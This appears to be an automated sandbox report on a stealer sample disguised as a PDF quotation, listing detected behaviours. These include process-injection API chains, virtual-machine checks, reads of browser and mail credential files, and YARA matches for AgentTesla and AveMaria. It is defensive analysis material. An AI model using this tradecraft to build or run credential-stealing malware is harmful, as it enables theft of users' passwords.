                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595276Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594608Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594171Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 7594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 2001Jump to behavior
                  Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599652Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599537Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599399Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599283Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599167Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599049Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598920Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598681Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598339Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598224Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598092Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597976Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597854Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597738Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597606Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597490Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597352Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597236Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597121Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597004Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596873Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596751Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596635Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596519Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596388Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596285Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595276Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594608Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594171Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,33_2_0041154A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI call chain: ExitProcess graph end nodegraph_33-11318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI call chain: ExitProcess graph end nodegraph_33-14072
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: xxxxxxxxt|VMWare|Virtualk=b24=stemd""sion\Run\
                  Source: Fhzejfh.exe, 00000026.00000002.472797955.000000000260A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: Fhzejfh.exe, 00000026.00000002.472797955.0000000002867000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen"select * from Win32_ComputerSystem
                  Source: Fhzejfh.exe, 00000026.00000002.472797955.0000000002867000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: xxxxxxxxt|VMWare|Virtualk=b24=stemd""sion\Run\`,`q
                  Source: AppLaunch.exe, 00000018.00000002.473407695.000000000A000000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471764044.0000000001546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00411446 FindFirstFileW,FindNextFileW,33_2_00411446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,33_2_0040955B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,33_2_004060B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00426222 mov eax, dword ptr fs:[00000030h]33_2_00426222
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041EB27 mov eax, dword ptr fs:[00000030h]33_2_0041EB27
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00411B38 mov eax, dword ptr fs:[00000030h]33_2_00411B38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00411B3F mov eax, dword ptr fs:[00000030h]33_2_00411B3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00411E6D mov eax, dword ptr fs:[00000030h]33_2_00411E6D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00406045 GetProcessHeap,RtlAllocateHeap,33_2_00406045
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Contains functionality to inject threads in other processes
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,33_2_00407B2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,33_2_00407D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,33_2_00413F7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe33_2_0041405F
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\donexx.exe "C:\Users\user\AppData\Local\Temp\donexx.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,33_2_00410A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,33_2_00412E91
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q@<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>{Win}r{Win}rTHeq
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-`q
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR`q
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q9<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>{Win}THeq
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q:<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>{Win}rTHeq
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q?<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>{Win}r{Win}THeq
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q4<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>@\`q
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\`q
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeQueries volume information: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\donexx.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeQueries volume information: C:\Users\user\AppData\Roaming\Fhzejfh.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeQueries volume information: C:\Users\user\AppData\Roaming\Fhzejfh.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00410E5E cpuid 33_2_00410E5E
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,33_2_00408D0F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_052A70F0 GetUserNameW,24_2_052A70F0

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Increases the number of concurrent connection per server for Internet Explorer
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000018.00000002.471458642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected AveMaria stealer
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Contains functionality to steal e-mail passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: POP3 Password33_2_004099FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: SMTP Password33_2_004099FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: IMAP Password33_2_004099FF
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \Google\Chrome\User Data\Default\Login Data33_2_0040B917
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \Chromium\User Data\Default\Login Data33_2_0040B917
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: donexx.exe PID: 6436, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 2472, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000018.00000002.471458642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected AveMaria stealer
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts121
                  Windows Management Instrumentation                  		11
                  Create Account                  		1
                  Access Token Manipulation                  		1
                  Disable or Modify Tools                  		3
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		Exfiltration Over Other Network Medium22
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                  Endpoint Denial of Service
                  Default Accounts1
                  Native API                  		1
                  Windows Service                  		1
                  Windows Service                  		11
                  Deobfuscate/Decode Files or Information                  		231
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		Exfiltration Over Bluetooth21
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts2
                  Service Execution                  		1
                  Registry Run Keys / Startup Folder                  		122
                  Process Injection                  		31
                  Obfuscated Files or Information                  		1
                  Credentials In Files                  		1
